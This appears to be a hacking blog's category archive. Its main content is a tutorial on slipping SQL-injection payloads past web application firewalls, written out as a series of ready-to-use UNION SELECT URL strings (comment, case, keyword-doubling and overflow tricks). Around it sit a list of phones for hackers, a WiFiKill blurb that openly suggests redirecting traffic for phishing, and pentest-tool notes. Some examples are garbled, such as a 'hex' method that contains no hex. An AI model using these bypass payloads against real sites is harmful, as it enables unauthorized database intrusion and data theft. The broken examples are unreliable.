Category Archives: Hacking
WHMCS Hacking
- Symlink Enable Shell
- Symlink Files
- My Tutorial 😉
Top Android Mobiles For Hackers~
OS | Android OS, v4.1.2 (Jelly Bean) | |
Memory | 8GB built-in, 1GB RAM, microSD card (supports up to 64GB) | |
Processor | Dual core 1.2 GHz, Broadcom BC28155 Chipset |
Qmobile Noir A20
OS | Android OS, 4.1 Jelly Bean | |
Memory | 4GB built-in + 8GB card included in box, 1GB RAM, microSD card(supports up to 32GB) | |
Processor | Quad-core 1.2 GHz, ARMv7 Chipset, GPU (PowerVR SGX) |
Qmobile Noir A50
OS | Android Jelly Bean (v 4.1) | |
Memory | 4GB ROM, 512 RAM, microSD card (supports up to 32GB) | |
Processor | 1GHz Dual Core |
Huawei Ascend G510 U8951
OS | Android OS, v4.1 (Jelly Bean) | |
Memory | 4GB built-in, 512MB RAM, microSD card(supports uo to 32 GB) | |
Processor | Dual core 1.2 GHz Cortex-A9 |
Sony Xperia L
OS | Android OS, v4.1 (Jelly Bean) | |
Memory | 8GB built-in 1GB RAM, microSD Card (supports up to 32GB) | |
Processor | Dual-core 1 GHz, Qualcomm MSM8230 Snapdragon Chipset |
Samsung Galaxy Note II
Android OS, v4.1.1 (Jelly Bean) | ||
Memory | 16/32/64GB built-in, 2GB RAM, microSD card (supports up to 64GB) | |
Processor | Quad-core 1.6 GHz Cortex-A9 |
Samsung Galaxy S3
Android OS, v4.0.4 (Ice Cream Sandwich) | ||
Memory | 16/32/64GB built-in, 1GB RAM, microSD card (supports up to 64GB) | |
Processor | Quad-core 1.4 GHz Cortex-A9 + Mali-400MP GPU, Exynos 4212 Quad |
HTC One
OS | Android OS, v4.1.2 (Jelly Bean), upgradable to v4.2.2 (Jelly Bean) | |
Memory | 32/64GB built-in, 2GB RAM | |
Processor | Quad-core 1.7 GHz Krait 300, Qualcomm APQ8064T Snapdragon 600 Chipset |
Sony Xperia Z
OS | Android OS, v4.1.2 (Jelly Bean), planned upgrade to v4.2 (Jelly Bean) | |
Memory | 16GB built-in 2GB RAM, microSD Card (supports up to 32GB) | |
Processor | Quad-core 1.5 GHz Krait, Qualcomm MDM9215M / APQ8064 Chipset |
How To Hack Targeted Server ?
Advance WAF ByPassing Techiques
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)
Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)
However, most WAF identify this method so they still show a “Forbidden” Error…
2) Change the Case of the Letters:
You can also change the Case of the Command:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)
However, as before, this trick is also detected by most WAF!
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!
4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)
I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....
(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....
If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))
2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()
[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! 😉
4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)
So, if you find such a silly function, you can exploit it, in this way! 😀
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)....
-15+(uNioN+SeleCT)+...
-15+(UnI)(oN)+(SeL)(ecT)+....
-15+union (select 1,2,3,4...)
BlackHat SEO – Get High Page Rank 4 Or 5
” Losses = 10 Benefits = 4 “
WiFiKill v1.7 – WiFi EjeCtOr
If you want to disable any ip address which use same router to connect internet. Now you can used your android application, WifiKill use as can disable internet connection for a device on the same network. This is alternate version of NETCUT for Android. Simply allows you to scan your wifi network for devices, see their vendor and cut network connection for specified devices. This way you can get rid of network hoggers. It gives option to redirect HTTP traffic to specific IP, this feature can be used even to do phishing smartly. Changelog: – fixed the counter bug (I hope for the last time) – added an option to redirect HTTP traffic to specific IP (caution! this may lead to significant CPU load) – now successful kills are tagged by green icon on the left of IP (this is not 100% correct)
Network Security Toolkit v2.16.0-4104 Released
The Network Security Toolkit is bootable ISO live CD/DVD (NST Live) is based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.
Yaptest – Penetration Framework
- Run nikto on anything nmap thinks is an HTTP service
- Run hydra on every host with TCP port 21 open
- Attempt upload a file to any TFTP servers found
- Run onesixtyone on all hosts that are up
- Try metasploit’s solaris_kcms_readfile exploit against any hosts running kcmsd